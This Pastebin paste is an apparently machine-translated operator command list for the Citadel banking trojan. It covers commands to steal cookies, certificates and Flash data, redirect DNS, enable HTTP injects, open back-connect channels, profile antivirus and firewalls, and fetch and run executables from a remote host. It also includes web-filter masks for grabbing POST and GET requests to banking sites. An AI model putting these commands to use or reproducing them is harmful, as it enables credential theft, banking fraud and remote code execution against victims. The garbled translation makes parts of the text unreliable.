Guest User

Citadel v1.3.4.5 - Commands.txt - Google Translate

a guest
Jul 29th, 2012
568
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.98 KB | None | 0 0
  1. Work with the OC.
  2.  
  3. os_shutdown - Shut down the computer
  4. os_reboot - Reboot the computer
  5.  
  6. Working with the bot.
  7.  
  8. bot_uninstall - Unload boat from your computer
  9. bot_update [url] - Update the configuration of the bot
  10.  
  11. bot_bc_add [service] [ip] [port] - Create a back-Connect connection to the bot
  12. bot_bc_remove [service] [ip] [port] - Remove back-soednenie connection with the bot
  13.  
  14. bot_httpinject_disable [url_mask] - Turn off injection produce a bot
  15. bot_httpinject_enable [url_mask] - Enable the implementation of a bot inzhekta
  16.  
  17. Working with the user.
  18.  
  19. user_destroy - Kill Axis bot
  20. user_logoff - Terminate a user session bot
  21. user_execute [url] - Run the executable file on a computer bot
  22.  
  23. user_cookies_get - Get a cookie from your computer bot
  24. user_cookies_remove - Remove the cookies from your computer bot
  25.  
  26. user_certs_get - Get a certificate from a computer bot
  27. user_certs_remove - Delete certificate from a computer bot
  28.  
  29. user_homepage_set [url] - Specify URL as a homepage bot
  30.  
  31. user_flashplayer_get - Get the SOL files from a computer bot
  32. user_flashplayer_remove - SOL delete files from a computer bot
  33.  
  34. dns_filter_add <host> <ip> - adding a mask to redirect
  35. dns_filter_add * microsoft.com 127.0.0.1 - adding a mask to redirect
  36. dns_filter_remove * microsoft.com - remove the mask to redirect
  37. dns_filter_remove <host>
  38. when you remove must be specified the same host as the addition of
  39.  
  40.  
  41.  url_open http://www.host.com
  42.  
  43.  Open the computer Holder arbitrary given page deflotovym browser to full screen, ideal for advertising something
  44.  
  45.  user_execute http://www.citadel-host.com/citadel_folder/file.php|file=exe.exe
  46.  
  47.  The team is working without the quotes, starting with version 1.2.4.0, need to fill in for the right exe file in the directory of files on your stronghold and point it at the end of the line.
  48.  
  49.  
  50. - We have added a new option in the section entry "StaticConfig"
  51.   disable_cookies 0
  52.   
  53.   1 disables sending cookies to the server at all.
  54.   0 includes sending cookies to the server.
  55.  
  56. - Now on the Section's WebFilters
  57. Two new parameters: P and G.
  58. Parameter P is given to the link points to a record only POST requests (all others are ignored), with this link.
  59. The parameter G indicates the recording just GET requests (all others are ignored) with the given link.
  60. The parameter! ignores the requests specified by the mask and do not miss them in the logs.
  61.  
  62. Examples:
  63. "Phttp :/ / *. Com /" - only to rob the post all requests in the http://. https:// ignores
  64. "Ghttp :/ / *. Eu / * banking *" - robs just all GET requests for a given mask.
  65. "Phttps :/ / *. Com /" - only to rob https://-post requests
  66. "! Http:// *. Com / *. Jpg" - ignore jpg images.
  67.  
  68.  
  69. - Getting information about installed software (the list - the company | product | version) on your computer: info_get_software
  70. - Getting information about the installed antivirus on your computer: info_get_antivirus
  71. - Getting information about the installed firewall on your computer: info_get_firewall
Add Comment
Please, Sign In to add comment